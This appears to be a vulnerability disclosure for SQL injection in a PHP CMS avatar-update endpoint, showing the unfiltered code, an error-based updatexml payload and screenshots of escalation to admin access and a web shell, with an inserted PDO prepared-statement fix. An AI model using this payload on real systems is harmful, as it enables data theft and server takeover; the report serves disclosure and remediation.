### Brief description:
Insufficient filtering at one location leads to SQL injection
### Details:
Where a user modifies their personal avatar:
```
http://localhost:8081/index.php?s=member&c=info&a=avatar
```
The submitted parameter is not filtered:
```
$data = $this->input->post('data', TRUE);
```
and is passed directly into the SQL query:
```
$this->member->update(array('avatar'=> $data['avatar']), 'id=' . $this->memberinfo['id']);
```
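A hardened version of this update, as an added example that is not the project's own code: it assumes a PDO connection (`$pdo`), a `member` table with `avatar` and `id` columns, and combines an allowlist check on the avatar path with a prepared statement so the POST value never becomes part of the SQL text.

```php
<?php
// Added example, not the project's code. Assumed names: $pdo (PDO connection),
// table `member`, columns `avatar` and `id`. The original code concatenated the
// id into the WHERE clause and passed $data['avatar'] to the query unchecked.

function isValidAvatarPath(string $avatar): bool
{
    // Allowlist: a relative upload path such as "uploads/2015/avatar.png".
    // Quotes, spaces, parentheses and ".." are not in the character class,
    // so an injection string like the one described above is rejected here.
    if ($avatar === '' || strlen($avatar) > 255) {
        return false;
    }
    return preg_match('#^[A-Za-z0-9_/\-]+\.(jpe?g|png|gif)$#', $avatar) === 1;
}

function updateMemberAvatar(PDO $pdo, int $memberId, string $avatar): bool
{
    if (!isValidAvatarPath($avatar)) {
        // Refuse the update rather than trying to "clean" the input.
        return false;
    }
    // Both values travel as bound parameters; user input is never interpolated
    // into the query string, so the error-based injection has nothing to attach to.
    $stmt = $pdo->prepare('UPDATE member SET avatar = :avatar WHERE id = :id');
    $stmt->bindValue(':avatar', $avatar, PDO::PARAM_STR);
    $stmt->bindValue(':id', $memberId, PDO::PARAM_INT);
    return $stmt->execute();
}

// Controller usage, keeping the original input call (assumed context):
// $data = $this->input->post('data', TRUE);
// $avatar = isset($data['avatar']) ? (string) $data['avatar'] : '';
// updateMemberAvatar($pdo, (int) $this->memberinfo['id'], $avatar);
```

The validation is a defence in depth; the prepared statement alone already removes the injection, and the allowlist additionally stops unexpected paths from being stored as an avatar.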
This allows injection; I used the following injection payload:
```
'or updatexml(1,concat(0x7e,(version())),0) #
```
Enter the injection payload in the thumbnail field:
![QQ截图20150630082535.png](https://images.seebug.org/upload/201506/30082601cd49c1c6280729c54b860c32f6237618.png)
After submitting, the error-based injection returns information:
![QQ截图20150630082459.png](https://images.seebug.org/upload/201506/3008262090b8d535a8b243b072c525f5531d5afd.png)
After getting into the admin backend via the injection, modify the template:
![QQ截图20150630082635.png](https://images.seebug.org/upload/201506/30082704e1ad22496b6960da38cba0b01f4b3c4f.png)
which gives a shell (getshell):
![QQ截图20150630082642.png](https://images.seebug.org/upload/201506/3008271532fce65ec33a9ab737ba8db771071ff6.png)
### Proof of vulnerability:
![QQ截图20150630082459.png](https://images.seebug.org/upload/201506/3008262090b8d535a8b243b072c525f5531d5afd.png)